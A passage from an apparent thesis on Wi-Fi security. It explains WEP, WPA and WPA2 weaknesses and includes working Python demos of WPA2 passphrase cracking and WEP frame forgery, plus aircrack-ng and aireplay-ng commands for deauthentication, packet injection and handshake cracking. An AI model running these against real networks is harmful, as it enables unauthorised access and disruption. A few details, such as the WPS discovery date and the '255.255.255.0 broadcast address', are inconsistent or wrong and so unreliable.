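    min(ANonce,SNonce) || max(ANonce,SNonce)); for CCMP: KCK(16) || KEK(16) || TK(16).
    Both nonces enter the derivation, which is why every client ends up with its own keys."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


MIC_OFFSET = 81      # Key MIC field: 4-byte 802.1X header + 77 bytes of EAPOL-Key fields
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP/CCMP/PSK


def build_msg2(snonce, key_data=RSN_IE):
    """EAPOL-Key message 2 of the four-way handshake (station -> AP), MIC field zeroed.
    Key Information 0x010a: descriptor version 2 (HMAC-SHA1), pairwise, MIC bit set."""
    body = (b"\x02"                          # descriptor type: RSN
            + struct.pack(">H", 0x010A)      # key information
            + b"\x00\x00"                    # key length (0 in message 2)
            + (1).to_bytes(8, "big")         # replay counter
            + snonce                         # key nonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # key IV, RSC, ID
            + b"\x00" * 16                   # key MIC (zero while computing it)
            + struct.pack(">H", len(key_data)) + key_data)
    return b"\x02\x03" + struct.pack(">H", len(body)) + body


def eapol_mic(kck, frame):
    """WPA2/AKM 00-0F-AC:2: MIC = HMAC-SHA1(KCK, EAPOL frame with MIC zeroed), first 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def sign_msg2(pmk, aa, spa, anonce, snonce):
    """What a legitimate station sends: message 2 with a valid MIC under the real PSK."""
    frame = build_msg2(snonce)
    kck = derive_ptk(pmk, aa, spa, anonce, snonce)[:16]
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def crack_psk(ssid, aa, spa, anonce, snonce, msg2, wordlist):
    """Offline dictionary attack: everything except the passphrase is visible in the
    capture, so recompute the MIC per candidate and compare it with the captured one."""
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_ptk(derive_pmk(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), captured_mic):
            return candidate
    return None


# Constructed handshake parameters (not from a real capture).
SSID = "VilniusNet"
AA = bytes.fromhex("001122aabbcc")          # access point MAC
SPA = bytes.fromhex("66778899ddee")         # station MAC
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
PASSPHRASE = "Vilnius2015"
WORDLIST = ["password", "12345678", "Vilnius2015", "wardriving"]

if __name__ == "__main__":
    msg2 = sign_msg2(derive_pmk(PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)
    print("recovered passphrase:", crack_psk(SSID, AA, SPA, ANONCE, SNONCE, msg2, WORDLIST))
```

derive_pmk can be checked against the test vector published in the 802.11i annex (passphrase "password", SSID "IEEE" gives PSK f42c6fc5...a12e). The cost of the attack is the 4096-iteration PBKDF2 per candidate, which is why the text says the attack must be dictionary based; and because derive_ptk mixes in both nonces, the PTK of a second client with a different ANonce or SNonce is a different key, so its traffic cannot be decrypted without its own handshake even when the passphrase is known.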
2.4.5 WPA2 SECURITY
As mentioned before, WPA was released before its completion due to market pressure. The
WPA version rolled out relied on TKIP, based on RC4 encryption, typically with a shared
key. This type of security covered almost all the problems of the previous versions and
spread quickly; nowadays plenty of wireless networks with WPA security can still be
found.
But its early release meant that the planned standard was not published in full, and
what had been designed especially for corporate environments, with stronger encryption,
was missing.
Today, support for this standard is mandatory for equipment wishing to be certified by
the Wi-Fi Alliance.
Picture 12: Wi-Fi Alliance seal of approval
A correct implementation of this standard protects the data sent and received over a
local network. This implementation is called RSN (Robust Security Network) and is
defined by 802.11i.
The rest of the original standard, which had not been published at the beginning, was
published in 2004 by the same group, 802.11i, and received WPA2 as its official and final
name.
WPA2 greatly improves on its predecessor, WPA, while keeping support for it.
There are some differences between the WPA and WPA2 technologies.
The main distinction is that WPA2 is deployed in two modes: WPA2 Personal and WPA2
Enterprise.
WPA2 Personal, also called WPA2 Home, is adequate for most networks and is the type of
security found at home and in small businesses. It needs only a single passphrase, which
is used by all clients. If the passphrase is changed at the access point, it must be
changed manually on all clients. The passphrase is stored on the clients.
Picture 13: example of how WPA2 Home works.
WPA2 Enterprise, also known as WPA2-802.1X, is used in enterprise environments. It is
more complicated to set up and provides individualized and centralized control over
access to the wireless network. When users try to connect, they must present their
credentials. This mode uses 802.1X authentication against a RADIUS server, so WPA2
Enterprise can be used only when a RADIUS server is available for client authentication.
The use of an external RADIUS server allows multiple authentication methods (EAP with
PKI certificates, Active Directory credentials, etc.). With this, the key derived for each
session is unique per user and the key distribution to the infrastructure is improved.
Picture 14: example of how WPA2 Enterprise works.
In addition to the above, WPA2 also incorporates a new encryption protocol, CCMP, based
on the AES algorithm.
AES offers a higher security level, but it requires hardware support that devices built
only for WEP and WPA do not have. AES works on 128-bit blocks with keys of 128, 192 or
256 bits (CCMP uses 128-bit keys), and it is considered the best cipher available. It is
true that AES needs more computing power, which affects the battery consumption of
some mobile devices, but AES is not only safer but also more efficient, because CCMP
adds less per-frame overhead than TKIP. WPA2 also incorporates PMK (Pairwise Master
Key) caching to facilitate roaming between access points. CCMP is more reliable than
TKIP, which is based on the RC4 algorithm.
Despite what has been said above, WPA2, and therefore WPA, still allows the exploitation
of several vulnerabilities, such as the recovery of the shared key by brute force, in
addition to a denial of service or two.
More recently, two further vulnerabilities have been discovered:
1. TKIP attack: this attack allows the injection of a small packet of data into the
network. It is very interesting from a technical point of view, but very impractical. On
July 17th 2015, techreport.com published an article reporting how new attacks broke the
RC4 encryption algorithm in 75 hours. It must be remembered that WEP can be broken
within minutes.
2. Injection of packets into a station: the problem with this exploit is that it is only
possible if the shared key is known, that is, from within the network. This exploit is
called Hole196 because the weakness of WPA2 it relies on is described on the last line of
page 196 of the 2007 revision of IEEE 802.11, which is 1232 pages long.
But there is another vulnerability that attackers may exploit: Wi-Fi Protected Setup,
known as WPS.
WPS, originally Wi-Fi Simple Config, appeared as a way to simplify the configuration of
a network with WPA2, minimizing user intervention in domestic environments or small
offices. It is based on the use of an eight-digit PIN to configure access to the network.
Stefan Viehböck, a security researcher, discovered in December 2011 a vulnerability in
the WPS implementation of wireless routers that have it enabled. This vulnerability
allows an attacker to obtain the PIN by brute force and, therefore, the pre-shared key of
the WPA2 network.
It must be said that this vulnerability cannot be exploited on all routers.
2.5 ANALYSIS OF HOW TO BREAK CURRENT WIFI SECURITY
2.5.1 INTRODUCTION
The attacks suffered by telecommunications networks are many and varied, ranging from
the intrusion of viruses and Trojans to the alteration and theft of confidential
information. One of the most serious problems Wi-Fi technology currently faces is
security. A high percentage of networks are installed by system and network
administrators for the simplicity of deployment, without any security consideration,
turning them into open networks that do not protect the information flowing through
them.
As mentioned before, there are several alternatives for protecting a wireless network,
WEP being the weakest and oldest and WPA2 the safest and newest.
In this section of the work, some of the ways to break these encryption methods will be
explained. Attacks on WEP and WPA2 will be carried out.
2.5.2 ATTACKS ON OPEN NETWORKS
In the last twelve years this kind of network has proliferated, giving citizens the
possibility of connecting to the Internet anytime, anywhere. With the fast rise of
smartphones, these networks have peaked in the last six years, since users want to
access the Internet without consuming the data allowance of their mobile network
operator.
In such networks no authentication is used and the communication between nodes is not
encrypted. All information circulates as plain text and can easily be intercepted at any
point, with simple equipment, within the range of the network. In this type of network
the user's security depends on the upper layers of the OSI model (mainly the application
layer).
Users may use private infrastructure, like a VPN. But using a VPN does not mean the user
is safe: Larry Seltzer, a Software Engineer, wrote an article about this topic: “(…) even
beyond this time gap, sometimes VPN connections go down. At least in the default
configurations of most operating systems, the applications on the system will fail over to
the open Wi-Fi connection. Don't blame just the public VPN vendors. The same problem
is true of corporate VPNs, unless they go to the trouble of configuring the system around
the problem.” [4]
Sniffing passwords and cookies is not difficult, and a lot of information about it can
easily be found on the Internet nowadays. The software required is free and easy to work
with.
An example is Wireshark. Wireshark is a free and open-source packet analyzer, used for
network troubleshooting, analysis, software and communications protocol development,
and education. Originally named Ethereal, the project was renamed Wireshark in May
2006 due to trademark issues.
Picture 15: Wireshark starting screen.
But not everything is lost, and there are ways to protect ourselves from network sniffing.
1. Avoid working on the same network as people we don't trust: open networks exist
so that we can always be online. Thanks to them we can check our email, our social
networks and our favourite websites, but we must keep in mind that our traffic can be
sniffed.
2. Always use HTTPS: packet sniffing will not reveal a password or cookies on a
properly encrypted HTTPS connection. Most popular websites already allow HTTPS
connections, and some, like Facebook or Gmail, have made HTTPS their default, but not
all of them. Many sites still do not support HTTPS at all, and others only support it for
the login (meaning the password is safe, but the session cookie is not).
3. Use a VPN or SSH proxy: this is the best option. A VPN or SSH tunnel acts as the
middleman between our computer and the dubiously secure servers on the Internet, so
that everything sent between our computer and the VPN or SSH server is encrypted, in
effect encrypting all the traffic that someone on the current network might try to sniff.
Even though the last option is the best one, as said before, a VPN connection may fail or
may take a while to connect. And not all VPNs are safe: one of the most popular VPNs on
the Internet, "Hola! For a better Internet", uses its users' bandwidth to create a botnet.
Hola! sells that bandwidth, so whoever buys it is free to use it at will. Hola! does not
encrypt traffic either, so if someone uses our bandwidth to do something illegal, it is
basically us who are responsible for it.
Hola! works as a peer-to-peer VPN service, meaning that if I am a user in Lithuania and
want to appear online as a user in Spain, Hola! redirects my traffic through another user
who is actually in Spain. This happens in the free version of Hola!, in which every user
is some other user's exit node.
Better than Hola!, there are some other free VPN services, like TunnelBear or StrongVPN.
A. Traffic monitoring attack.
This attack is the easiest one. We only need to switch our interface into monitor mode*,
scan the medium passively, locate the target (as long as it is an OPEN network) and start
the capture against the access point or points that broadcast that network.
* Note: monitor mode, or RFMON mode, allows a computer with a wireless network
interface controller to capture all the traffic it receives from the wireless medium,
without associating to any network.
Keep in mind that an OPEN network in a large public space will not have only one access
point, but several, located in different places.
Depending on the kind of implementation, there may be one main access point with the
others acting as Wi-Fi repeaters, all on the same channel, or different access points with
the same ESSID broadcasting on different channels.
It depends on each case and on the chosen target, but it might be interesting to capture
the traffic of one specific station. In that case the capture must be pointed at the
specific access point, or all the traffic on a specific channel must be captured without
applying a BSSID filter.
I am not going to expand on this attack, since it has no difficulty and a lot of
information can be found on the Internet.
B. Denial-of-service attack on clients
Probably one of the most famous attacks, and a very easy one to perform.
This attack consists of sending deauthentication frames to the connected clients. It
causes the clients to be deauthenticated from the access point and, therefore, they are
no longer able to surf the Internet.
C. Spoofing attack on clients
This attack is common on those OPEN networks where one has to pay to get access to the
Internet. The correct execution of this attack depends on the implementation of each
network and on the specific case, but normally the steps are the following:
1. Identify the list of clients connected to the access point.
2. Launch a deauthentication attack against the client.
3. Impersonate the client's MAC address on our own adapter.
4. Connect to the OPEN network in place of the client.
But this attack implies that the client will not be able to get access to the Internet.
Besides, the success of this attack depends on many elements, for example how fast the
client reconnects to the OPEN network. So, in a lot of cases, the attacker and the client
will be competing for access with the very same MAC address and, on paper, neither the
client nor the attacker would get access to the network.
D. Capturing login credentials to the hotspot
This attack is also aimed at getting access to the Internet through those OPEN networks
where one has to pay.
In this attack, the attacker monitors and analyzes the traffic, captures the login
credentials and therefore gets access to the Internet through the network without paying,
using the credentials of another user.
2.5.3 ATTACKS ON WEP TECHNOLOGY
As I have explained before, WEP encryption was the first widely deployed security
measure, but it did not last long. Within a year the first vulnerabilities and cracking
methods started to appear.
By capturing a large number of data packets and performing a statistical analysis, the
shared key of the network can be recovered, giving access to the network.
These statistical methods obtain results in less time than brute-force attacks based on a
dictionary of possible passwords.
Over the years these statistical methods improved, reducing the number of packets
required to recover the key. Nowadays, with modern computers, WEP can easily be
broken within three minutes.
One vulnerability of WEP lies in the way it uses the key during authentication with SKA
(Shared Key Authentication). Because of this, not long after its publication, users were
advised against its use.
A simple attack on this authentication exchange provides the attacker with a small but
sufficient sample of the same data in plain text and in encrypted form (the challenge
sent in clear by the access point and the station's encrypted response), which allows the
attacker to derive a portion of the keystream.
The keystream is the byte sequence that, XORed with the plain text, makes it possible to
produce new encrypted packets for that IV without knowing the cipher key.
Picture 16: how keystream is generated in WEP
Another weakness that allows the exploitation of this breach in WEP is the lack of any
control over the reuse of an IV that has already been used. Thanks to this, any IV can be
reused as many times as desired, which allows a replay attack and the injection of forged
packets encrypted with the recovered keystream.
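The keystream recovery and IV reuse just described are shown end to end in the following Python example, added here and not part of the original thesis. It implements RC4 and the WEP frame format (IV, key ID byte, RC4 over the payload plus the CRC-32 ICV), recovers the keystream for one IV from the clear SKA challenge and its encrypted response, and then forges a new frame with that IV and keystream that the receiver accepts. The 40-bit key, the IV and the 128-byte challenge are constructed for the example, not taken from any real network.

```python
import struct
import zlib


def rc4(key, length):
    """RC4 key scheduling plus enough PRGA output for `length` bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def icv(plaintext):
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(key, iv, plaintext):
    """WEP body: IV(3) || key id(1) || RC4(IV || key) XOR (plaintext || ICV)."""
    keystream = rc4(iv + key, len(plaintext) + 4)
    return iv + b"\x00" + xor(plaintext + icv(plaintext), keystream)


def wep_decrypt(key, frame):
    """Return the plaintext, or None when the ICV fails (the receiver would drop it)."""
    iv, body = frame[:3], frame[4:]
    data = xor(body, rc4(iv + key, len(body)))
    plaintext, received_icv = data[:-4], data[-4:]
    return plaintext if received_icv == icv(plaintext) else None


def recover_keystream(frame, known_plaintext):
    """SKA shows the attacker both the clear challenge and its encryption, so the
    keystream for that IV is C XOR (P || ICV(P)); the key itself is never needed."""
    return frame[:3], xor(frame[4:], known_plaintext + icv(known_plaintext))


def forge_frame(iv, keystream, new_plaintext):
    """WEP never rejects a reused IV, so the recovered keystream encrypts any new
    payload up to its length; the ICV is recomputed so that the frame is accepted."""
    data = new_plaintext + icv(new_plaintext)
    if len(data) > len(keystream):
        raise ValueError("recovered keystream is shorter than the forged frame")
    return iv + b"\x00" + xor(data, keystream)


# Constructed values (no real key or capture): a 40-bit WEP key, one IV and the
# 128-byte SKA challenge the access point would send in clear.
KEY = bytes.fromhex("0a1b2c3d4e")
IV = b"\x11\x22\x33"
CHALLENGE = bytes((37 * n + 11) & 0xFF for n in range(128))

if __name__ == "__main__":
    response = wep_encrypt(KEY, IV, CHALLENGE)          # the station's SKA response
    iv, keystream = recover_keystream(response, CHALLENGE)
    forged = forge_frame(iv, keystream, b"ARP request injected with a reused IV")
    print("forged frame accepted:", wep_decrypt(KEY, forged) is not None)   # True
```

The forged frame decrypts correctly at the access point even though the attacker never learned KEY: CRC-32 is linear and unkeyed, so the ICV offers no protection against forgery, and because nothing tracks which IVs have been seen, the same 132-byte keystream can be reused for any number of frames of that length or shorter. This is exactly what the active reinjection attacks described later rely on to generate traffic.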
If Shared Key Authentication is disabled in WEP, we obtain Open System Authentication
(OSA).
There are some differences between SKA and OSA. In OSA the authentication and the
association will always be accepted by the access point. Even though this might, at first
sight, seem to go against its own security, the fact that the station is accepted does not
mean it will be able to communicate with the access point if it does not have the shared
key to encrypt and decrypt its communications with the access point.
Even though WEP is known to be a weak security measure, some WEP networks can still
be found during a wardriving session. These networks should be updated to WPA or
WPA2.
A. Passive attack and statistical break
Passive monitoring of a network with WEP encryption is no different from monitoring the
traffic on an OPEN network.
However, the aim of the monitoring is to gather enough traffic to break the WEP
encryption. This corresponds to approximately 30,000 IVs, although the amount may vary
from case to case and with the length of the key.
This attack involves no difficulty beyond having to wait for the traffic to be generated,
which generally takes a considerable amount of time; the more traffic the network carries,
the less time is required. This type of attack is usually discarded because it is not fast,
but if there is time enough, it is ideal.
It is ideal because, being a passive attack, it leaves no trace on the target network.
B. Passive attack and break using a dictionary
As mentioned before, the statistical passive break requires a large amount of time, and sometimes we do not have this time. In this case, we can try to break the WEP encryption by combining the statistical attack with a dictionary of possible passwords, if we have one.
In this case, all we need is to obtain four DATA packets with IVs in order to proceed with the dictionary attempt. As in the example given before, the dictionary is passed to the aircrack-ng tool as a parameter.
The dictionary may contain the list of possible passwords either in ASCII or in hexadecimal format. In the latter case, the prefix h: must be added when specifying the path of the file.
Last but not least, the length of all the possible passwords must be the same as the one specified on the command line when running the tool. Otherwise, aircrack-ng will ignore the dictionary and try a statistical attack instead and, without enough IVs, it will never succeed.
C. Active attack by ARP reinjection
The ARP reinjection attack (ARP Request Replay) is the most effective way of generating traffic in a network with WEP security. The attack consists in capturing an ARP packet and sending it back to the access point, which answers with another ARP packet carrying a new IV. The attack retransmits the same ARP packet over and over again, generating a new IV each time, until we have enough IVs.
In point 6.3.1, during the example of how to break WEP security, we ran the command
aireplay-ng -3 -b MAC_TARGET_ROUTER wlan0mon
A brief explanation of the parameters follows:
1. -3: this parameter specifies an ARP injection attack.
2. -h: this parameter specifies the MAC address of the client whose ARP packet we are trying to intercept. We did not use this parameter in the attack.
3. -b: this parameter specifies the BSSID, the MAC address of the access point. We used this one in the attack.
To carry out an ARP injection correctly, the MAC address of an associated client is necessary, because the access point will only retransmit packets that come from an associated client.
Once the attack had started, as can be seen in picture number X, the number of ARP packets rose.
The same could be seen during the attack in the console where we ran the airodump-ng command, after running the injection
D. Active attack by reinjection with interactive selection
In addition to the previous attack, there is an alternative for those occasions in which we did not manage to capture an ARP packet. We can take another kind of genuine packet, modify it and inject it again to obtain a reply from the access point. This kind of attack is called an Interactive Replay attack. It is similar to the ARP injection attack and uses the aireplay-ng command with the parameter -2.
This attack allows us to choose the packet to reinject, either from the network adapter or from a previously stored capture file.
But not every packet can be chosen, and we cannot freely pick the packet we want. Only certain packets will be properly reinjected and accepted by the access point. An example of a packet that will always be retransmitted by the access point is one destined to the broadcast address, specified by the MAC address FF:FF:FF:FF:FF:FF and with the To DS flag set to 1 (To DS: To Distribution System), which looks like it belongs to a wireless client and is destined to the wired network.
An example would be:
aireplay-ng -2 -b F0:84:2F:0B:DB:C1 -d FF:FF:FF:FF:FF:FF -t 1 wlan0mon
The different parameters are explained next:
1. -2: this parameter specifies the injection attack with interactive choice.
2. -d FF:FF:FF:FF:FF:FF: this parameter selects the packets whose destination address is the broadcast address.
3. -t 1: this parameter selects packets with the To DS flag set.
4. -b: this parameter specifies the BSSID, the MAC address of the access point.
5. wlan0mon: this parameter specifies the network adapter.
Once the attack has started, the aireplay-ng command analyzes the captured packets until it finds one that meets the specified requirements, displays it on screen and lets the user reinject it or discard it in order to look for other alternatives.
If we decide to use it and the attack has worked correctly, the airodump-ng screen will show how the number of DATA packets increases. If this does not happen, we must choose another packet and start again.
E. Chop chop attack
Sometimes it may happen that no clients are connected to the network, or that the aireplay-ng command is not able to obtain any genuine packet that will be accepted by the access point.
In these cases, there is an alternative attack based on the predictability of the CRC32 cyclic redundancy code that is carried by every single packet sent by the access point.
This attack is known as the Chop Chop attack. It consists in obtaining a genuine packet, modifying it by exploiting the CRC32 weakness and then reinjecting it to check the
response of the access point to every modification. This process yields enough keystream to "build" a specific ARP packet, since we know how that specific packet is structured. The keystream, as explained before in this thesis work, is the sequence that allows a packet we have built to be enciphered properly.
Once we have built an ARP packet, we can inject it again and, in that way, increase the traffic of IVs, as in the previous attacks.
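The two properties this section relies on, the keystream recovered from a known plaintext being reusable under a repeated IV (from the WEP introduction earlier in this section) and the predictability of the CRC32 code that the Chop Chop attack exploits, can be seen in a toy model. The following Python is an added example, not code from the thesis or from the aircrack-ng project; it uses a simplified WEP frame layout, constructed key, IV and payload values, and adds a keyed HMAC check only to contrast it with the CRC.

```python
"""Toy model of WEP (added example, not code from the thesis).
Frame = IV (3 bytes) || RC4_{IV||key}(payload || CRC32(payload)). Shows that
(1) one known plaintext/ciphertext pair yields the keystream for that IV and,
as WEP allows IV reuse, that keystream enciphers a new frame the receiver
accepts; (2) the CRC32 ICV is affine, so a frame can be altered and its ICV
fixed without the key, while a keyed MIC (HMAC, standing in for the MIC of
WPA/WPA2) rejects it. All sample keys, IVs and payloads are constructed."""
import hashlib
import hmac
import struct
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """Return `length` bytes of RC4 keystream for `key` (KSA + PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):  # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):  # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: little-endian CRC32 of the payload."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    plain = payload + icv(payload)
    return iv + xor(plain, rc4(iv + key, len(plain)))


def wep_decrypt(key: bytes, frame: bytes):
    """Receiver side: return the payload if the ICV verifies, else None."""
    iv, body = frame[:3], frame[3:]
    plain = xor(body, rc4(iv + key, len(body)))
    payload, tag = plain[:-4], plain[-4:]
    return payload if icv(payload) == tag else None


def recover_keystream(frame: bytes, known_payload: bytes) -> bytes:
    """Known plaintext: ciphertext XOR (payload || ICV) is the keystream."""
    return xor(frame[3:], known_payload + icv(known_payload))


def forge_with_keystream(iv: bytes, keystream: bytes, payload: bytes) -> bytes:
    """Encipher a new payload under a reused IV; the key is never needed."""
    plain = payload + icv(payload)
    if len(plain) > len(keystream):
        raise ValueError("recovered keystream is too short for this payload")
    return iv + xor(plain, keystream)


def flip_bits_fix_icv(frame: bytes, delta: bytes) -> bytes:
    """XOR `delta` into the hidden payload and repair the encrypted ICV.
    CRC32 is affine: crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros(len(d))),
    so the ICV correction is computable without seeing p or the key."""
    iv, body = frame[:3], frame[3:]
    if len(delta) != len(body) - 4:
        raise ValueError("delta must cover the payload exactly")
    icv_delta = xor(icv(delta), icv(bytes(len(delta))))
    return iv + xor(body, delta + icv_delta)


def mic(key: bytes, payload: bytes) -> bytes:
    """Keyed integrity tag (truncated HMAC-SHA1), the property WEP lacks."""
    return hmac.new(key, payload, hashlib.sha1).digest()[:8]


def demo() -> dict:
    key = bytes.fromhex("0123456789")  # constructed 40-bit WEP key
    iv = b"\x01\x02\x03"  # constructed IV
    known = b"ARP who-has 192.168.1.1?"  # payload the attacker can guess
    frame = wep_encrypt(key, iv, known)
    # (1) keystream recovery and reuse under the same IV
    ks = recover_keystream(frame, known)
    forged = forge_with_keystream(iv, ks, b"forged text under IV")
    # (2) CRC malleability: change the last "1" to "2" (0x31 ^ 0x32 == 0x03)
    delta = bytearray(len(known))
    delta[22] = 0x03
    tampered_payload = wep_decrypt(key, flip_bits_fix_icv(frame, bytes(delta)))
    return {
        "forged_accepted": wep_decrypt(key, forged) == b"forged text under IV",
        "tampered_payload": tampered_payload,  # b"ARP who-has 192.168.1.2?"
        "crc_accepts_tampered": tampered_payload is not None,
        "mic_accepts_tampered": hmac.compare_digest(
            mic(key, known), mic(key, tampered_payload or b"")),
    }
```

Calling demo() shows the receiver accepting both the forged frame and the tampered one while the HMAC check rejects the tampering: a CRC detects transmission errors, not deliberate modification, which is why WPA and WPA2 replaced it with a keyed MIC.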
The first step in this attack is capturing the traffic of the target and, afterwards, performing a fake authentication.
Next, we run the following command:
aireplay-ng -4 -h MAC_NETWORK_ADAPTER -b MAC_ACCESS_POINT wlan0mon
1. -4: this parameter specifies the Chop chop CRC32 prediction attack.
2. -h: this parameter specifies the MAC address of the network adapter, which must be the same as the one specified in the fake authentication.
3. -b: this parameter specifies the BSSID, the MAC address of the access point.
4. wlan0mon: this parameter specifies the network adapter.
Once the packet found by aireplay-ng has been chosen, its modification starts in order to carry out the attack and, in this way, obtain the necessary section of the keystream.
Once we have the keystream stored in a file with the .xor extension, the next step is to "build" a valid ARP packet with the packetforge-ng tool.
The command to run is as follows:
packetforge-ng -0 -a ACCESS_POINT_MAC -h NETWORK_CARD_MAC -k DESTINATION_IP_ADDRESS -l ORIGIN_IP_ADDRESS -y FILE.xor -w OUTPUT_FILE arp-request
1. -0: this parameter specifies the type of packet we are going to generate: an ARP packet.
2. -a: this parameter specifies the access point MAC address.
3. -h: this parameter specifies the network card MAC address.
4. -k: this parameter specifies the destination IP address to include in the packet. If the range is not known, the broadcast address may be used: 255.255.255.0.
5. -l: this parameter specifies the origin IP address to include in the packet. If the range is not known, the broadcast address may be used: 255.255.255.0.
6. -y: this parameter points to the keystream file obtained in the previous step.
7. -w: this parameter is the output file where the ARP packet to be sent will be stored.
Once the packet has been "built", the next step is to inject it with an interactive selection attack, as we saw in the previous attack:
aireplay-ng -2 -r ARP_FILE.cap wlan0mon
where -r specifies the file with the ARP packet to be injected.
If the attack has been carried out successfully, as in the previous attacks, the console where airodump-ng is running will show how the number of DATA packets increases. Once the number of packets is big enough, the only thing left is to run
the command aircrack-ng.
F. Fragmentation attack
This attack is very similar to the Chop Chop attack. It uses a method based on the protocol for fragmenting packets into smaller packets and on predicting their new enciphered value. It is a powerful attack but not very efficient, since not all access points support this protocol.
The steps to follow are the same as in the previous attack. The only change is that, when executing the attack with aireplay-ng, the value -5 is given as the attack parameter, which specifies a fragmentation attack.
G. Other attacks on WEP technology
Other attacks on WEP are based on attacking the client instead of the access point: their probe request messages are captured and a WEP network is looked for among their favourite Wi-Fi networks; the clients are then deceived with a fake access point that imitates the original one, so that they log into the fake access point, and the keystream is captured from those packets. Once we have the keystream, as we have seen before in this thesis work, we know how to proceed.
There are two attacks focused on the clients: Caffe Latte and Hirte.
2.5.4 ATTACKS ON WPA AND WPA2 TECHNOLOGY
Next, a brief explanation of some attacks against WPA and WPA2 and how they are carried out. The following topics will be discussed:
1. Brute force attacks using dictionaries against WPA and WPA2.
2. Password dictionaries.
3. Attack against WPS.
A. Brute force attacks using dictionaries against WPA and WPA2
As mentioned before, attacks against WPA and WPA2 networks can only be done by using dictionaries.
The first step when attacking a WPA or WPA2 network is similar to what we have seen before: disable our network card, spoof the MAC address of the network card with macchanger, create a virtual interface in monitor mode and start looking for a target. Once we have found our target, the second step is to start capturing the packets being transmitted on the channel of the target network, filtering by BSSID.
We must remember that clients need to be connected to the access point in order to get the handshake.
Then we perform the deauthentication attack against one client. Once the client tries to connect again, the authentication process will start and the handshake packets can be captured.
To do this attack, we execute the following command:
aireplay-ng -0 1 -a ACCESS_POINT_MAC -c CLIENT_MAC wlan0mon
where the parameter -0 specifies the deauthentication attack, 1 indicates the number of deauthentications to be sent, -a specifies the BSSID (MAC address) of the access point, -c is the MAC address of the client we are attacking and wlan0mon is our network adapter.
If the attack has been carried out successfully, we will see how the station we attacked goes offline and connects again within a short time. It is at this moment that the handshake packets are exchanged. Once the handshake has been captured, we can stop capturing packets and move to the last step: breaking the password with dictionaries.
To proceed with this step we need a good password dictionary. If we have one, we execute the following command:
aircrack-ng -w DICTIONARY HANDSHAKE_FILE.cap
If the password dictionary is good, all we have to do is wait.
B. Password dictionaries
By this point we already know how important it is to have a good password dictionary in order to have a chance of breaking WPA or WPA2. There is a lot of information online, such as Rainbow Tables. [5]
But something we must keep in mind while creating our password dictionary is the default Wi-Fi passwords found in the routers provided by the main network operators.
These passwords are produced by an algorithm that generates the password from a seed which depends on the BSSID, the access point MAC address or the ESSID of the network.
Over time these algorithms are broken and, before long, plenty of tools are available on the Internet. These tools generate dictionaries with all the possible passwords for the specific network operator they are designed for.
Even though network operators are nowadays changing the way they create the passwords, we can easily find plenty of networks with those passwords whose owners did not change the default password.
Stefan Viehböck, of whom I have spoken already in this thesis work, also discovered the WPA2 password generation algorithm used by Vodafone Europe [6], so dictionaries for this operator can already be produced.
C. Attack against WPS
We have already talked about the vulnerability of WPS technology. Discovered in January 2011, it allows a brute force attack to obtain the eight-digit PIN necessary to get access to the network and, in this way, get access to the WPA2 password.
There are a lot of tools, the best at the time of writing being Reaver, which is included in the Kali Linux operating system.
2.5.5 CONCLUSION ON WI-FI WEAKNESS POINTS
In this section I have discussed the different ways to break the security measures we may find in today's Wi-Fi networks, from OPEN networks to WPA2 networks. I have also shown how easily WEP encryption can be broken nowadays.
When we connect to an OPEN network, we must be aware that our traffic can be easily captured. Some hints have been given in this thesis work. Next time we connect to the free Wi-Fi at the airport, we should think twice.
It has been noted that WEP is the worst encryption measure. WEP security can be broken within minutes and it does not require great knowledge in the field of wireless security: a lot of information can be found, online and in books, and with current computers the process is really fast. As we will see in the next section, some WEP networks can still be found, even today. Those networks are targets for hackers. We should all upgrade to WPA or WPA2 if possible.
Even though WPA is safer than WEP, it was released before it was finished, so it was only fit for domestic environments, not for business environments. When WPA was released it was known as WPA-PSK. One pre-shared key for all the clients might be enough for a house, but definitely not for a big company.
That is when WPA2 appeared. WPA2 was released in 2004 and came in two different versions: WPA2 Home and WPA2 Enterprise, the latter based on authentication against an authentication server, which allows multiple authentication methods.
In the next section we will also see that most of the networks detected in Vilnius use this kind of encryption.
WPA and WPA2 are the safest encryption methods nowadays but, as we have seen, they are not free of weak points; those vulnerabilities are, however, more difficult to exploit than the ones found in WEP encryption.
